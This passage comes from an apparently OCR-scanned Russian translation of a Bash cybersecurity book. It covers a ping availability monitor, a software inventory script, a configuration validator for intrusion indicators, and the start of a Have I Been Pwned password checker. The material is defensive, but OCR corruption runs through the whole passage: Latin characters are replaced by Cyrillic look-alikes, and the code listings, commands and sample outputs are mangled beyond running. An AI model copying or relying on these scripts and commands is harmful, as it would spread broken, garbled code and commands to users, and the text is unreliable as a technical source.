О проверять связи с каждым перечисленным в файле устройством; 


О уведомлять пользователя, если устройство не отвечает на рт5-запрос. 


Используемые команды 


В этой главе мы рассмотрим команду р1пв, с помощью которой проведем тестиро- 
вание удаленной системы. 


ріпа 


Чтобы определить, доступна ли удаленная система, команда ріп использует про- 
токол управления Интернетом и обмена сообщениями (ІСМР). Он изначально до- 
ступен как в Глпих, так и в Ұіпіоуѕ, но между протоколами в обеих системах есть 
небольшие различия. Обратите внимание: если вы для запуска ріпе применяете 
Сі Ваѕћ, будет использована версия протокола для \Уіпіомѕ. 


Трафик ІМСР может быть заблокирован сетевыми брандмауэрами и другими 
устройствами. Если вы пингуете устройство и оно не отвечает, это не обязательно 
означает, что устройство недоступно; возможно, просто включена фильтрация 
пакетов ІСМР. 
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Общие параметры команды 


О -с (пах) — количество отправляемых в удаленную систему запросов ріпу. 
О -п (У т4о\з) — количество отправляемых в удаленную систему запросов ріпе. 


О -м (пих) — время ожидания ответа в секундах. 


О -и (№! 140%5$) — время ожидания ответа в миллисекундах. 
Пример команды 


Для однократной проверки связи узла 192.168.0.11 нужно выполнить следующее: 
$ ріпе -п 1 192.168.0.11 


Р1п51п5 192.168.0.11 мі+һ 32 буїеѕ оф Яаа: 
Кер1у Ғгот 192.168.0.11: буеѕ=32 біте<1т5 ТТЕ=128 


Ріпе ${а%1${1с5 Фог 192.168.0.11: 

РасКкеїѕ: ЅепЕ = 1, Кесеіуей = 1, 1051 = @ (0% 1055), 
Арргох1тафе гоипа Єгір ©ітеѕ іп ті11і-ѕесопӣѕ: 

Міпітит = Өтѕ, Махітит = Өтѕ, Ауегаре = Өтѕ 


Реализация 


В примере 19.1 подробно описано, как можно использовать Баѕћ и команду ріпе 
для создания постоянно обновляемой панели мониторинга, которая предупредит 
вас, если система перестанет быть доступной. 


Пример 19.1. ріпотопіќог.5ћ 


#1/ріп/баѕћ - 

# 

Вай и кибербезопасность 
ріпртопітћог. ѕћ 


Описание: 
Проверка связи для мониторинга доступности хоста 


Использование: 

ріпевтопітог.ѕһ <+11е> <ѕесопаѕ> 
<+11е> Файл, содержащий список хостов 
<5есопа$> Количество секунд между пингами 


У -Н---+-+- 


мһі1е гие 

до 

с1еаг 

есһо 'СуБегзесиг1Фу Ор$ Ѕуѕёет Моп1Фог' 
есһо '5фафи$: 5сапп1т8 ...' 
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есһо "----------------------------------------- ' 
мһі1е геа -г ірааа 
до 
ірайӣ=$(есһо "$ірааа" | ѕеа '$/\г//') 1] 
ріпв -п 1 "$1рааа" | евгер '(реѕёіпа+іоп һоѕї ипгеасһаб1е |100%)' &> /ӣеу/пи11 Ө 


1 (С "$?" == 0 )) ө 
{Пеп 
Ери зека+ 1 [4] 


есһо "Ноѕ $ірада по Фоипа - $(да+е)" | ее -а топітог1ов.їхї Ө 
ери ѕетағ 7 

11 

аопе < "$1" 


есһо 
есһо "Бопе." 


Жог ((1="$2"; і > 0; 1--)) [6] 

ао 
риє сир 1 ё [2] 
есһо "Ѕ+аёиѕ: М№Мехі ѕсап іп $1 зесопа$" 
51еер 1 

аопе 

аопе 


© Удаление разрывов строк после чтения поля из файла в \/ш4о\з. 


Ө Однократная проверка связи с хостом. вгер применяется для поиска в выводе 
команды ріпе фраз Без 1паЕ1оп ћоѕ+ ипгеаспаб1е (Целевой хост недоступен) или 
100 % — это означает, что хост не найден. Поскольку используется ріпе -п, этот 
сценарий настроен для выполнения в операционной системе \/шао\5. Для вы- 
полнения сценария в Глпих укажите ріпа -с. 


Ө Проверка, завершила ли команда вгер работу с кодом состояния 6: это означает, 
что были обнаружены строки с ошибками и хост не ответил на запрос ріпе. 


Ө Установка красного цвета шрифта для важного текста. 


© Уведомление пользователя о том, что хост не найден, и добавление сообщения 
в файл топіёог1ор.Ёхї. 


© Запуск обратного отсчета времени до начала следующего сканирования. 
Ө Перемещение курсора в строку 1, столбец 0. 


Чтобы запустить ріпртопіќог. ѕћ, предоставьте ему файл, содержащий список 
ТР-адресов или имен хостов (по одному на строку) и время задержки между ска- 
нированиями в секундах: 


$ ./ріпетопіог.ѕћ топіог.ЁхЕ 60 


Сурегѕесигі+у 0рѕ Зузет Мопіёог 
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Зфафи$: МехЕ ѕсап іп 5 зесопа$ 


Но5+ 192.168.0.110 пої Ғоипа - Тие, №\ 6, 2018 3:17:59 РМ 
Ноз+ 192.168.0.115 пої Фоипа - Тие, №\ 6, 2018 3:18:02 РМ 


ропе. 


Если вы хотите, чтобы сканирование выполнялось быстрее или медленнее, можете до- 
бавить параметр -м/м, определяющий, как долго команда ріпр станет ожидать ответа. 


Выводы 


Команда ріпе обеспечивает простой и эффективный способ контроля доступности 
сетевого устройства. Следует отметить, что протокол ріпе может быть заблокирован 
в сетевых или хост-брандмауэрах, и из-за этого его надежность не очень высока. 
Если один пакет ріпе не прошел, это еще не означает, что устройство отключилось. 
Чтобы проверить, работает устройство или нет, вы можете попытаться создать ТСР- 
соединение с устройством и посмотреть, отвечает ли оно. Это действие особенно 
полезно, если вы знаете, что система является сервером с открытым ТСР-портом. 


В следующей главе мы разработаем инструмент для создания списка программ, 
работающих в системах внутри сети. 


Упражнения 


1. Сохраните текущий список с отмеченными датами и временем успешного об- 
ращения к каждой системе. 


2. Добавьте аргумент, в котором можно указать диапазон отслеживаемых ТР- 
адресов. 


3. Если система становится недоступной, отправьте сообщение по электронной 
почте на указанный адрес. 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт ПИрь: //млмм.гарасубегор$.сот/. 


Инструмент: проверка 
установленного 
программного обеспечения 


Для обеспечения безопасности сети очень важно знать, какое программное обе- 
спечение у вас установлено. Эта информация не только позволит вам лучше 
понимать текущую ситуацию, но и может использоваться для внедрения более 
совершенных средств управления безопасностью, например, белых списков про- 
грамм (аррИсайоп Вей итэ). Определив имеющееся программное обеспече- 
ние, вы можете сформировать белый список программ. Все программы, которые 
не добавлены в белый список, например вредоносные программы, выполняться 
не будут. 


Дополнительные сведения о белом списке программ для \Міпаомѕ можно получить 
в документации корпорации Мегозой по адресу Һр: //ЬЇ1у/2ҮрС6ї2. 


Для Ипих см. статью Ѕесигіќу Епһапсеа Шпих (ћрѕ://оїһир.сот/ЅЕШпихРгојесі). 


В этой главе мы разрабатываем сценарий ѕоҒ+іпу. $1, чтобы получить список про- 
граммного обеспечения, установленного в конкретной системе, для последующего 
агрегирования и анализа. Вот требования к этому сценарию: 


О обнаружение используемой операционной системы; 


О выполнение соответствующих команд для отображения списка установленного 
программного обеспечения; 


О сохранение списка установленного программного обеспечения в текстовом 
файле; 


О имя файла должно быть сформировано таким образом: һоѕъпате_ѕо#іпу.хї, 
где һоѕёпате — это имя системы, в которой был запущен сценарий. 
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Используемые команды 


Для выяснения того, какое программное обеспечение установлено в системе, 
предназначены команды ар*, ірке, мпіс и уит. Инструмент, который будет для это- 
го использован, определяется не только операционной системой — \Лп4о\з или 
Тіпих, но и дистрибутивом установленной Глпих, например, ОБипи или Кеа Наф. 


арі 


Адуапсеа Раскавіпе Тод] (АРТ) есть во многих дистрибутивах Піпих. Он позволяет 
устанавливать пакеты программного обеспечения и управлять ими. 


Общие параметры команды 


О Іпѕ+а11 — установить указанный пакет программного обеспечения. 
О Урдаее — синхронизировать список пакетов с последними версиями. 


О 1151 — вывести список программных пакетов. 


О КВетоуе — удалить указанный пакет программного обеспечения. 
Пример команды 


Отобразить список всех пакетов программного обеспечения, установленных в си- 
стеме, можно с помощью такой команды: 


арфе 1154 --1п5{а11еа 


арка 


Как и ар, арке используется для установки пакетов программного обеспечения 
и управления ими в дистрибутивах Глпих на основе ОеЫап. 


Общие параметры команды 


О -1 — установить пакет. 


О -1 — вывести список пакетов. 


О -г — удалить пакет. 
Пример команды 


Отобразить список всех пакетов программного обеспечения, установленных в си- 
стеме, можно с помощью следующей команды: 


арке -1 
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МИС 


М/МТС (\Мт4о\з Мапаветепі Гаѕігитепѓабйіоп Соттав4) применяется для 
получения сведений об оборудовании и системе, управления процессами и их 
компонентами, а также изменения настроек с использованием возможностей 
инструментария управления \/п4о\з (#іпаомуѕ Мапазетепе Гаѕігитепёайоп, 
М\/МП. В этой главе мы сосредоточимся на аспектах управления пакетами мтіс, 
но для получения дополнительной информации о других функциях см. докумен- 
тацию Мисгозой (нир://5.у/2щеух\). 


Общие параметры команды 


О Ргосеѕ5 — управление текущими процессами. 


О Ргодис* — управление установочными пакетами. 
Пример команды 


Отобразить список программного обеспечения, установленного в системе, можно 
с помощью следующей команды: 


$ мтіс ргодисЕ ре пате, уег$1оп //Фогта*: сѕу 


ушт 


ҮеПожаов Орааѓсе Моаібей (ҮОМ) — открытый консольный менеджер пакетов 
для дистрибутивов Глпих, основанных на пакетах формата КРМ. Команда уит 
позволяет облегчить работу с обновлениями дистрибутивов, отслеживая взаимо- 
зависимости между пакетами. При наличии только КРМ вы можете получить 
информацию с помощью команды грт -да, но ҮОМ — это оболочка для КРМ более 
высокого уровня. 


Общие параметры команды 


О Іпѕёа11 — установить указанный пакет программного обеспечения. 


О 115+ — вывести список программных пакетов. 


О Кетоуе — удалить указанный пакет программного обеспечения. 
Пример команды 


Отобразить список всех пакетов программного обеспечения, установленных в си- 
стеме, можно с помощью следующей команды: 


учт 1151 іпѕ%а11еа 
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Реализация 


Для определения операционной системы мы могли бы использовать сценарий, 
показанный в примере 2.3. Но, кроме типа операционной системы, при работе 
в пах нам необходимо определить дистрибутив Глпих. Некоторые из этих дис- 
трибутивов основаны на ОеЫап и используют его систему управления пакетами. 
Другие предусматривают иной подход с соответствующим набором инструментов. 
Мы просто посмотрим, существует ли в нашей системе определенный исполня- 
емый файл, и если это так, выведем соответствующий тип операционной системы 
(пример 20.1). 


Пример 20.1. зо пу.5И 
#1/бріп/баѕћ - 


# 

# Ваѕһ и кибербезопасность 

# ЅѕоҒЕіпу.5һ 

# 

# Описание: 

# Перечисление установленного в системе программного обеспечения 
# для последующего агрегирования и анализа 

# 

# Использование: ./ѕоҒёіпу.5һ [+11епате] 

# вывод записывается в $1 или <По$%пате>_$о-+1п\. хе 
# 


# задаем имя файла вывода 
ООТЕМ="${1 : -Ф{НОЅТМАМЕ }_ѕоҒёіпу. ёх} " Ф 


# какая команда будет запущена, зависит от типа и дистрибутива ОС 
О5Базе=и1п 

Журе -Е грм &> /деу/пи11 ө 
(( $? == ё )) && Оѕраѕе=грт © 
фуре -+ арке &> /аеу/пи11 

(($? == 0 )) && ОѕЅбаѕе=ер 

уре -Е арі &> /4еу/пи11 

(($? == Ө )) && Оѕбаѕе=арї 


саѕе ${05Базе} іп ө 
міп) 
ІМУСМО= "мтіс ргодисе рет пате, мегѕіоп //Ғогта+ : сѕу" 
55 
грм) 
ТМ\/СМО="грм -да" 
55 
аер) 
ІМУСМО="арке -1" 
э 


арї) 
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ТМУСМО="ар* 115% --1п$5%а11еа" 


РЕЈ 
7) 
есһо "еггог: ОЅраѕе=${05баѕе}" 
ехії -1 


2) 


# запустить проверку 
# 
ФТМУСМО 2>/4е\у/пи11 > $О0ТЕМ 5] 


© Сначала мы даем определение файлу вывода. Если при вызове этого сценария 
пользователь указал аргумент (в нашем случае это $1), он будет задан в имени 
файла вывода. Если нет, по умолчанию будет использовано определенное обо- 
лочкой имя $НОЅТМАМЕ, к которому мы добавим оставшийся текст (_ѕоЁіпу.Ёх+). 


Ө Здесь мы, отбрасывая и $4о%, и $6 4егг, проверяем, доступен ли конкретный ин- 
струмент управления пакетами: только после получения результата (успех/неуда- 
ча) принимается решение о том, существует ли в этой системе данный инструмент. 


Ө Оболочка Баз помещает полученное значение предыдущей команды в $?, 
и только после этого проводится сравнение. Если значение равно 0, значит, коман- 
да выполнена успешно. В этом случае мы присваиваем значение Оѕбаѕе, чтобы 
запомнить, какой дистрибутив (или версию №ірӣӢоуѕ) используем. Мы делаем 
это для каждого применяемого инструмента. 


Ө С помощью оператора саѕе можем выбрать, какую команду будем выполнять 
для сбора нужной информации, включая все аргументы. 


Ө В этой части сценария выполняется настоящая работа: команда запускается, и ее 
вывод направляется в файл. 


Определение остального 
программного обеспечения 


При просмотре списка файлов с помощью ар, арке, мтіс или уит будет об- 
наружено только то программное обеспечение, что установлено с помощью 
менеджера пакетов. Если программное обеспечение — это исполняемый файл, 
который был скопирован в систему, не попав в менеджер пакетов, он не будет 
виден. Трудно определить программное обеспечение, которое таким образом 
было введено в систему, но все-таки некоторые методы для обнаружения таких 
файлов существуют. 
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В операционных системах Піпих исполняемые файлы в основном хранятся в ката- 
логах /64пти /изг/61т. Сначала нужно просмотреть эти каталоги. Переменная $РАТН, 
определяемая пользователем, указывает оболочке, где искать исполняемые файлы. 
Вы можете перечислить в $РАТН каждый из этих каталогов (разделяя двоеточием). 
Конечно, любой пользователь может установить свое собственное значение для 
ФРАТН, но было бы разумнее использовать один базовый корневой каталог. 


В операционной системе Ұіпаоуѕ наиболее очевидным методом станет поиск 
файлов с расширением .ехе. Такой поиск можно выполнить с помощью команды 
Ғіпа: 


Ғіпа /с -фуре + -пате '*.ехе' 
Этот метод работает только в том случае, если файл имеет расширение .ехе. Однако 


расширение можно легко изменить. Для более надежного определения исполняемых 
файлов стоит выполнить поиск с помощью файла +уреѕеагсћ. ѕћ из примера 5.4. 


Сначала необходимо определить вывод команды +11е для исполняемых файлов 
УУіпаоуѕ и іпих. Ниже приведен вывод для исполняемого файла \іпао\ѕ: 


міпехатр1е.ехе: РЕЗ2 ехесифаб1е (С0І) ТпЕе1 80386, Рог М5 Міпӣомѕ 


Далее показан вывод исполняемого файла пих: 


піхехатр1е.ехе: ЕІЕ 64-614 15В ехесифаб1е, х86-64, уегѕіоп 1 ($\5\) 


Слово ехесиёаб1е мы видим в выводе для обоих файлов. Для поиска этого слова 
можно использовать сценарий +уреѕеагсћ. $1, хотя в этом случае есть риск полу- 
чить ложные срабатывания, если поисковый запрос будет обширным. 


Чтобы использовать сценарий ёуреѕеагсһ.ѕһ для поиска исполняемых файлов, 
введите следующее: 


$ ./фурезеагсй.$И -1 ехесифаБ1е . 


./піхехатр1е.ехе 
.Гміпехатр1е.ехе 
. Геуреѕеагсһ.ѕһ 


Обратите внимание, что сценарий +уреѕеагсһ.ѕһ для Баѕһ также выбран, так как 
он содержит исполняемый код. 


Последний вариант — поиск файлов, для которых установлено разрешение на вы- 
полнение. Это не значит, что данный файл исполняемый, но лучше продолжить 
проверку и таких файлов. 


Чтобы найти файлы с разрешениями на выполнение в Г4пих, введите такую команду: 


Ғіпа / -регт /111 
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В среде \/ш4о\$ этот метод менее действенен из-за способа обработки прав до- 
ступа. Для каждого файла владельцами часто устанавливаются полные права 
(включая выполнение), что при поиске на основе прав доступа может привести 
к большому количеству ложных срабатываний. 


Выводы 


Определение программного обеспечения, установленного в системах, — важный 
шаг к пониманию текущего состояния вашей среды. 


После того как вы провели обзор программного обеспечения, для агрегирования 
и анализа данных можете использовать методы, представленные в главах 6 и 7. 


Далее мы разработаем инструмент для проверки текущей конфигурации системы. 


Упражнения 


Попробуйте расширить и настроить функции сценария ѕо#ёіпу.ѕћ, добавив сле- 
дующие возможности. 


1. Измените сценарий таким образом, чтобы, если аргументом является символ -, 
вывод записывался в $4ои6. (Можете ли вы это написать одной строкой?) 


2. Для дистрибутивов Глпиах измените сценарий так, чтобы просмотреть содержи- 
мое каталогов /ріп и /иѕг/Ббіп с помощью команды 15. 


3. Добавьте функцию, которая с помощью $5Н автоматически загружает файл 
вывода в центральный репозиторий. Для управления аутентификацией можете 
создать ключ 55Н. 


4. Добавьте функцию, которая будет сравнивать предыдущий список установ- 
ленного программного обеспечения (содержащегося в файле) с текущим про- 
граммным обеспечением и выводить информацию о любых различиях. 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт ћірѕ://Лумм.гарійсубегорѕ.соту/. 


Инструмент: проверка 
конфигурации 


Для системного администратора или специалиста по безопасности полезно иметь 
инструмент, который позволит проверить текущую конфигурацию системы, напри- 
мер существующие файлы, значения реестра или учетные записи пользователей. 
В дополнение к проверке конфигурации этот инструмент может использоваться 
в качестве облегченной системы обнаружения вторжений. Для этого следует 
сравнить запись базовой конфигурации с текущим состоянием системы и выявить 
изменения. Вы также можете использовать его для поиска конкретных данных, со- 
держащихся в записях или файлах системного журнала, несущих угрозу для работы 
системы или сети (индикаторов компрометации). 


В этой главе мы разработаем инструмент для чтения ряда конфигураций, хра- 
нящихся в текстовом файле. При этом нам нужно проверить, есть ли этот файл, 
заданы ли права на его чтение и существует ли данная конфигурация в системе. 
Этот инструмент предназначен для работы в операционной системе \/т4о\з, но 
его можно легко изменить для работы в Глпих. 


Реализация 


Сценарий уа11даесоп+1в .зП проверяет следующее: 


наличие или отсутствие файла; 


хеш 5НА-1 файла; 


ооо 


значение раздела реестра Ұіпіо%ѕ; 


О наличие или отсутствие пользователя или группы. 


В табл. 21.1 показан синтаксис файла конфигурации, который будет считан сце- 
нарием. 


Глава 21. Инструмент: проверка конфигурации 


271 


Таблица 21.1. Формат файла проверки 


Значение 


Формат 


Наличие файла 


Не <_Ше ра > 


Отсутствие файла 


| е < ера > 


Хеш файла 


ҺаѕЬ < ѕһа1 ҺаѕЬ > < ера > 


Значение раздела реестра 


тп и" 


тез "< Кеу ра >" "< уаіше >" "< _ехресбе4_>" 


Наличие пользователя 


изег < изег14_> 


Отс утствие пользователя 


Тиѕег < иѕегіа > 


Наличие группы 


Отсутствие группы 


вгоир < егоцріа > 


| вгоир < егоиріа > 


В примере 21.1 показан образец файла конфигурации. 


Пример 21.1. уаіійсопћо.іхї 


иѕег јѕті+һ 


Ғі1е "с: \міпаомѕ\ѕуѕъетз2\са1с.ехе" 
1411е "с: \міпаомѕ\ѕуѕ%етз2\баа. ехе" 


Сценарий в примере 21.2 считывает ранее созданный файл конфигурации и под- 
тверждает, что данная конфигурация в системе существует. 


Пример 21.2. уаіійаїесопћд.ѕћ 


#!/61п/Ба$й - 

# 

Ваѕһ и кибербезопасность 
\а11Чафесоп+18.5Н 


Описание: 


Проверка наличия указанной конфигурации 


Использование: 
уа1ідатесоп+Ғіє.ѕһ < соп+18+11е 


спецификация конфигурации выглядит так: 
11! ]+1і1е | наз | кее | [! Јиѕег | [! Јегоир] [агвѕ] 


примеры: 
Ғі1е /иѕг/1оса1/біп/ѕ#х 


Іиѕег Бопо 


# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# 
# вгоир ѕ&идеп&5 
# 

# 


- файл существует 


һаѕһ 12384970347 /иѕг/1оса1/біп/ѕ#х - это хеш файла 
- нет разрешенного пользователя "Бопо" 


- должна быть группа $Фидеп{ф$ 


еггехії - показать правильное использование и выйти 
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ФипсЕ1оп еггех1* () 


{ 
есһо "іпуа1іа зупфах а 11пе $11" 
есһо "изаре: [!]+11е | Һаѕһ | гез | [! Іиѕег | [! 1егоор [аг5$]" Ф 
ехії 2 


} # еггехії 


# уЕ11е - проверка наличия имени файла 

# аргументы: 1: флаг "нет" - значение:1/0 

# 2: имя файла 

# 

Ғипс+іоп у#і1е () 

{ 
Іоса1 іѕТһеге=@ 
[[ -е $2 ]] 88 іѕТһеге=1 ө 
(( $1 )) &8 Іеї 15Тнеге=1-$15Тпеге © 


гефигп $іѕТһеге 


} # уе 
# проверить идентификатор пользователя 
Ғипсёіоп уиѕег () 
{ 
Іоса1 іѕ0ѕег 
$0СМО $2 &>/аеу/пи11 
150ѕег=$? 
іҒ (( $1 )) ө 
ёһеп 
Іеї 1$/5ег=1-$1$0зег 
+1 


гефиги $1$У5ег 
} # уизег 


# проверить идентификатор группы 
ФипсЕ1оп уєгоир () 
{ 

1оса1 іѕбгоир 

іа $2 &>/деу/пи11 


156г0ир=%? 
ЇҒ (( $1 )) 
ёһеп 


Іеї 15бгоир=1-$15бгоир 
+1 


гефигп $1$6гоир 


} # ургоир 


Глава 21. Инструмент: проверка конфигурации 273 


# проверить хеш файла 
ФипсЕ1оп уһаѕһ () 


{ 
]1оса1 геѕ=0 
1оса1 Х=%(5һа15ит $2) [5] 
14 [1 9х5 *} == $1 1] [6] 
ёһеп 
геѕ=1 
11 
гефигп $гез$ 
} # уһаѕһ 


# проверить системный реестр міпӣомѕ 
ФипсЕ1Топ угев () 


{ 
]1оса1 геѕ=0 
1оса1 Кеураїһ=%$1 
]оса1 уа1ие=$2 
1оса1 ехрес+ей=$3 
1оса1 ВЕС\/А!Е=$(ацегу $Ккеура+һ //\м $уа1ие) 
1+ [[ $КЕСУАІ == $ехрес+еа ]] 
{Веп 
геѕ=1 
#1 
гефигп фгеѕ 
} # угев 
# 
# таіп 
# 


# выполнить один раз, чтобы использовать в проверке идентификаторов пользователей 
ОСМр= "пе иѕег" 


Журе -Е пе &>/деу/пи11 || осмо="іа" [7] 
1п=0 
мһі1е геаЯ ста агеѕ 
ао 
Іеї 1п++ 
допоё=6 
14 [1 ${ста:0:1} == '!' ]] © 
{Пеп 
Чопо{=1 
Базеста=${ ста#\ ! } о 


61 
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саѕе "$Базеста" іп 
Ғі1е) 
ОК=1 
У+11е $аопоё "$агв5" 
геѕ=$? 
55 
һаѕһ) 
ОК=1 
# разделить аргументы на первое слово и остаток 
уһаѕһ "${агв$%% *}" "${агвъ#* }" © 
гез=$? 
55 
гер) 
# Только для МіпЯомѕ! 
ОК=1 
угев $агеѕ 
гез=$? 
55 
иѕег) 
ОК=@ 
уиѕег $аг8$ 
гез=$? 
55 
вгоир) 
ОК=@ 
Увгоир $агв$ 
гез=$? 
35 
*) еггехії Ф 
55 
еѕас 


1+ (( геѕ != ОК )) 
{Веп 
есһо "РАІ: [$1п] $ста $агв$" 
ТІ 
аопе 


© еггехіє —удобная вспомогательная функция, предоставляющая пользователю 
некоторую полезную информацию о правильном использовании сценария, — с по- 
следующим завершением работы, если появится значение ошибки. Синтаксис, 
используемый в сообщении иѕаве, — это типичный *піх-синтаксис: элементы, 
разделенные вертикальной линией, — варианты; элементы в квадратных скобках 
являются необязательными. 


Ө Для проверки существования файла используется 1+-1езз-оператор +. 


© Это простой способ переключения 1 на 0 или 0 на 1 при условии, что первый 
аргумент не равен нулю. 
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Ө Здесь для переключения используется удобочитаемый, но более громоздкий 
оператор 1+. 


© После запуска команды ѕһа1ѕит вывод будет сохранен в переменной Х. Вывод 
состоит из двух «слов»: хеш-значения и имени файла. 


© Чтобы проверить, совпадают ли значения хеш-функции, нам нужно из вывода 
команды ѕһа1ѕит удалить имя файла и второе слово. %% означает самое длинное 
возможное совпадение. 


Ө Команда +уре проинформирует нас о существовании команды пе*; если команда 
пе не будет найдена, вместо нее используем команду іа. 


Ө Напоминание: эта строка принимает подстроку ста, начинающуюся в позиции ө 
и принимающую только один символ; то есть это первый символ подстроки спа. 
Это восклицательный знак? Данный символ часто используется в программиро- 
вании для обозначения «нет». 


© Нам нужно удалить символ восклицательного знака из названия команды. 


© Как уже было сказано в комментарии, так вызывается наша функция упазп, 
аргумент делится на две части — первое слово и остаток. 


Ф Оператор саѕе в Баз в отдельных случаях позволяет сопоставлять шаблоны 
между собой. Общим шаблоном является звездочка, соответствующая любой 
строке, она применяется как крайний вариант, чтобы выполнить действие по 
умолчанию. Он будет использоваться, если остальные шаблоны не будут найдены. 
Если входные данные не соответствуют ни одному из вариантов, значит, это не- 
правильные входные данные. В этом случае для окончания работы мы вызываем 
функцию еггех1\. 


Выводы 


Сценарий уа1іда+есоп+ів. 5һ позволяет проверить, существует ли в системе опре- 
деленная конфигурация. Это полезно для проверки соответствия, а также для 
понимания того, есть ли в системе вредоносные программы или следы вторжения. 
Следы вторжения или наличие вредоносных программ выявляются в процессе 
поиска конкретных индикаторов компрометации. 


УАКА является отличным источником индикаторов компрометации на основе 
хоста. Чтобы узнать больше, посетите сайт УАВА: Ир: //Б5.1у/2РЕ$ОРх. 
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В следующей главе мы рассмотрим аудит учетных записей и учетных данных поль- 
зователей, чтобы определить, были ли они скомпрометированы. 


Упражнения 


Попробуйте расширить и настроить функции сценария ма1іаатесопғів. $ћ, добавив 
следующие возможности. 

1. Проверить, существуют ли определенные права доступа к файлу. 

2. Проверить, открыт или закрыт конкретный сетевой порт. 

3. Проверить, выполняется ли определенный процесс. 
4 


Предоставить возможность оставлять комментарии во входном потоке. Если 
первый символ считанной строки является хештегом, строка отбрасывается 
(то есть ничего не обрабатывается). 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт ПИрь: //млмм.гарасубегор$.сот/. 


Инструмент: аудит 
учетных записей 


Обычно пользователи и организации постоянно проверяют свои учетные записи, что- 
бы узнать, были ли в рамках известной утечки данных взломаны их адреса электрон- 
ной почты или пароли. Это важно, поскольку, если адрес электронной почты украден, 
его можно использовать в рамках фишинговой кампании. Опасность возрастает, если 
при этом была украдена и другая идентифицирующая информация. Украденные 
пароли обычно попадают в словари паролей и хешей. Если вы продолжаете исполь- 
зовать пароль, который был украден во время взлома (даже если он не был связан 
с вашей учетной записью), это делает вашу учетную запись более уязвимой для атак. 


В этой главе для аудита учетных записей пользователей мы используем сайт Науе 
І Вееп Рупе? (Һі&рѕ://һамеірееприпеа.сот/). Ниже перечислены требования к ин- 
струменту: 


О выполнить запрос һаҹеібееприпеа.сот, чтобы проверить, связан ли пароль с из- 
вестным нарушением; 


О выполнить запрос һахеібеепрупеа.сот, чтобы проверить, связан ли адрес элек- 
тронной почты с известным нарушением. 


Меня взломали? 


Сайт Һрѕ://һауеіреепрупеа.сот — онлайн-сервис, позволяющий пользователям опре- 
делять, были ли во время существенного взлома данных украдены адреса электрон- 
ной почты или пароли. Сайт имеет ВЕЗТЕ АРТ, который позволяет отправлять за- 
прос к базе данных, используя хеш ЅНА-1 пароля или адрес электронной почты. Это 
не требует от вас регистрации или использования ключа АРТ, но с одного и того же 
ТР-адреса не получится делать запросы быстрее чем один раз в 1500 миллисекунд. 


Полную документацию по АРІ можно найти на веб-странице АРІ \2 (ћір:// 
БіЕ.1у/2ЕОрнНЅҮ). 
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Проверяем, не взломан ли пароль 


Следующий О ВТ-адрес используется для запроса информации о пароле: 


НЕЕр$: //ар1 .рипейра$$мога$ . сот/гапёе/ 


По соображениям безопасности сайт Науе І Вееп Рупе4? не принимает необ- 
работанные пароли. Пароли должны быть предоставлены в виде частичного 
хеша ЅНА-1. Например, хешем ЅНА-1 пароля раѕѕмога будет строка такого 
вида: 56аа61е4с9693+13+068225066с+833167ее68+48. Для завершения запроса 
используются первые пять шестнадцатеричных символов хеша: 


НЕЕр$: //ар1 .рипейра$$мога$ . сот/гапзе/5Ьааб 


Науе І Вееп Р\упе4 возвращает список всех хеш-значений, начинающихся с этих 
пяти символов. Это делается в целях безопасности, так что Науе І Вееп Р\уупеа? 
или тот, кто наблюдает за вашим взаимодействием, не знает точный хеш пароля, 
который вы запрашиваете. После того как у вас появится список запрашиваемых 
хешей, вы можете выполнить поиск хеша своего пароля, используя его последние 
35 шестнадцатеричных символов. Если хеш вашего пароля есть в списке, значит, 
пароль был взломан. В противном случае пароль, скорее всего, безопасен: 


1ССЭЗАЕР7В58А1В631СВ55ВЕЗАЗАЗ 750285 :3 
102рА4053Е34Е76Е6576Ер1рА63134В5Е2А:2 
1072С007550416С21608Ар296ВЕ5СӨАЕЗЕӨ:10 
1Е2ААА439972480СЕС7Р16С795ВВВ429372:1 
1Е3687А61ВЕСЕЗ5Е69В7408158101С8Е414:1 
1Е4С9В93Е3Е0682250В86СЕ8331В7ЕЕ68Ер8:3533661 
20597Е5АС10А2Е67701В4АБ103А09Е72250:3 
20АЕВСЕ40Е55ЕБА1СЕО70175ЕС293150А7Е:1 
20ЕЕВ975547Е6А33С2882СЕЕ8СЕ2ВС49720:1 


Число, которое вы видите в каждой строке справа после двоеточия, указывает общее 
количество взломанных учетных записей, в которых использовался данный пароль. 
Неудивительно, что пароль раѕѕнога применялся во многих учетных записях. 


В примере 22.1 показано, как с помощью Баѕћ и команды сиг1 можно автоматизи- 
ровать этот процесс. 


Пример 22.1. сһескраѕѕ.5һћ 


#1/ріп/баѕћ - 

# 

Вай и кибербезопасность 
спесКра$$ .$И 


Описание: 


# 
# 
# 
# 
# Проверка пароля на соответствие 
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# базе данных сайта Науе І Вееп Рипеа? 
# 
# Использование: ./сһескраѕѕ.5һ [<раѕѕмога» ] 
# <раѕѕмога» Пароль для проверки 
# по умолчанию: читать из $%41п 
# 
ІР (( "$#" == 0 )) © 
+һеп 
ргіпҒ 'Епфег уои” раѕѕмога: ' 
геаа -5 раѕѕіп ө 
есһо 
е1ѕе 
раѕ51п="$1" 
11 
ра$$1п=$(еспо -п "$раѕѕіп" | ѕһа1ѕит) [3] 


раѕѕ51п=%{раѕѕіп:0:40} 


#ігѕЕЕіуе=${раѕѕіп:0:5} ө 
епӣіпв=${раѕѕіп:5} 


рипед=$ (сиг1 -5 "һёёрѕ:/ /арі.рипейраѕѕмогӣѕ.сот/гапве/ФҒїгѕ+Еіуе" | \ 
г -4 '\г' | вгер -1 "Фепадіпе" ) ө 
раѕѕмогағоипӣ=%${ рипеа#+* : } 


1+ [ "Фраѕѕмогағоипа" == "" ] 

+һеп 
ехії 1 

е15е 
рг1пЕ+Р 'Раѕѕмога 1$ Рмпеа #4 Тітеѕ ! \п' "Фраѕѕмогағоипа" 
ехії ө 

1 


© Здесь проверяется, был ли пароль передан в качестве аргумента. Если нет, поль- 
зователю будет предложено ввести пароль. 


Ө Чтобы не показывать вводимые пользователем данные, для команды геаа задан 
параметр -5. Это рекомендуется делать при запросе паролей или другой конфиден- 
циальной информации. При использовании параметра -$ при нажатии клавиши 
Егќег новая строка не появится. Поэтому после оператора геаа мы добавляем пустой 
оператор есһо. 


Ө Здесь введенный пароль преобразуется в хеш ЅНА-1. В следующей строке ис- 
пользуется операция подстроки Баѕћ для извлечения первых 40 символов, удаляя 
